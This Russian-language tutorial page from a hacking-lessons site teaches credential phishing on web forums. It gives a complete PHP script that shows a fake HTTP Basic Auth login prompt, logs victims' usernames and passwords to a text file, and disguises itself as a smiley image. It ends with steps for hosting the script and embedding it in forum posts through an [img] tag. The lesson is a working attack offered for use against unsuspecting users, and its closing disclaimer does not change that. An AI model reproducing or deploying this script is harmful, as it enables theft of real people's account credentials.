Главная Мой профиль Регистрация Выход Вход
Вт
17.10.2017
09:02
Приветствую Вас Гость | RSS ВходРегистрацияГлавная
Поиск
Друзья сайта
Опрос
Какой у вас процессор?
1. Intel Core 2 Duo
2. Не Intel у меня, ацтаньте!
3. Intel Pentium 4
4. Intel Core i7
5. Беспанятия :(
6. Ниже Pentium 4
7. Intel Core 2 Quad
8. Intel Core 2 Extreme
Всего ответов: 415
Статистика




Онлайн всего: 1
Гостей: 1
Пользователей: 0



Главная » Уроки » Класс 2

Фейк-форма веб авторизации
Урок 3

В этом уроке мы рассмотрим ещё один способ заимствования пароля пользователей, который по сути очень похож на фейк. Во-первых, мы снова заставляем пользователя вводить логин и пароль в нашу подставную форму, во-вторых, мы снова будем вытягивать пароль из пользователя, а не взламывать базу данных сайта. Конечно, это проще и быстрее, но у этого пути взлома есть свои недостатки: мы рассчитываем лишь на невнимательность и легкомыслие нашей жертвы. Но хватит тут теоретических разглагольствований, поехали осуществлять наши адские планы!

Как это работает

Со стороны пользователей это выглядит так: сидят они себе на любимом форуме, просматривают темы и вдруг бац! Появляется такое:

Доверчивый пользователь либо сразу честно введёт свой логин и пароль, либо закроет окно... что же, не беда, через некоторое время оно снова откроется! smile Конечно, 100% гарантии что жертва введёт свой настоящий пароль нет, но шанс что кто-нибудь попадётся всё-таки есть.
Ок, так это увидит жертва, а как такое сделать? Всё очень просто! На любом уважающем себя форуме пользователи имеют возможность вставлять в свои сообщения изображения. Но ведь это так скучно! Давайте вместо изображения вставим так ссылку на скрипт, который запросит логин, пароль и запишет их!

Готовим тот самый скрипт

Содержимое его таково:
Code
<?
if(!$_COOKIE['LOGON'])
{
      $login = $_SERVER['PHP_AUTH_USER'];
      $pass  = $_SERVER['PHP_AUTH_PW'];
      //Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
      if(strlen($pass) <= 4 || !$login)
      {
       Header('HTTP/1.1 401 Unauthorized');
       Header('WWW-Authenticate: Basic realm="Session end."');
      }
      elseif($login)
      {
       setcookie('LOGON',md5($pass)); //ставим кукис, чтобы при повторном заходе авторизации небыло, а в самом начале проверка есть ли кукис
       // записываем логин и пасс в base.txt
       $log = fopen("base.txt","at");
       fwrite($log,"\n $login:$pass \n");
       fclose($log);
       //делаем скрипт картинкой
       header("Content-type: image/gif");
       //делаем изображение смайликом из архива
       $image = imagecreatefromgif('img.gif');
       imagegif($image);
       imagedestroy($image);
      }
}
?>

Сохраняем всё в файл smile.php. Так же в папке со скриптом создайте пустой base.txt и положите картинку с именем img.gif. Например, эту:
Объясню немного что делает данный скрипт. Сначала он проверяет, сохранены-ли кукис для данного сайта (они сохраняются после ввода пользователем логина и пароля). Если их нет, запрашивает логин и пароль и сохраняет их в файл base.txt, после чего сохраняет кукис и превращается в загадочный смайл (ну или любую картинку, которую вы сохраните в файле img.gif). Так как кукис сохраняются, при последующих запусках скрипта, он не будет спрашивать логин и пароль, картинка также не будет появляться (после проверки, есть-ли кукис, скрипт будет просто завершаться).

Тестирование

И снова нам пригодится наш localhost! Кидаем эти 3 файла (smile.php, img.gif, base.txt) на localhost и открываем наш smile.php в браузере. Должна появится форма с запросом логина и пароля (см. картинку выше). Вводим что угодно (пароль не менее 5 символов) и, если всё правильно, видим на странице нашу картинку из img.gif. После обновления страницы она должна оказаться пустой и запрос ввода больше не должен появляться (ведь кукис уже сохранены). Теперь лезем в base.txt - там должно быть то, что вы вписали в поля логин и пароль. Надеюсь, всё прошло гладко.

Заливаем всё на хост

Теперь нужно залить всё на хостинг с поддержкой php, дабы можно было вставлять в сообщения ссылку на наш скрипт. По той же схеме, что и с фейком, заливаем все 3 файла на хост и ставим права 777 для base.txt. Не грех было бы проверить всё ещё раз, не так-ли? =)

Пользуемся нашим творением!

Для того, чтобы наша форма ввода появилась на странице форума, нужно просто вставить её адрес в сообщение как картинку, то есть как-то так:
Code
[img]http://host.com/smile.php[/img]

Только напишите в вашем сообщении что-нибудь ещё, чтобы оно не оказалось пустым. wink
Пользуйтесь наздоровье, но не забывайте о риске быть забаненным за такие дела (надеюсь, вы поняли о чём я cool )! До скорого!

Обсуждение урока на форуме
Категория: Класс 2 | Добавил: M@ZAX@KEP (09.01.2010)
Просмотров: 5971 | Рейтинг: 5.0/2


Форма входа
Логин:
Пароль:
Меню сайта
Категории
Класс 1
Здесь учат самым элементарным вещам. Этот уровень необходимо посетить тем, кто ещё плохо ориентируется в компьютерах.
Класс 2
Здесь даются основные навыки хакерства. Этот класс для тех кто давно на "ты" с компьютерами, изучил винду вдоль и поперёк, а потом устал просто так сёрфить по инету и решил научится ещё чему-нибудь ;)
Уроки PHP
Мини-уроки php by JUMP
Мини-чат
    Все материалы на сайте предоставлены исключительно в ознакомительных целях.
     Администрация не несет никакой ответственности за последствия их использования.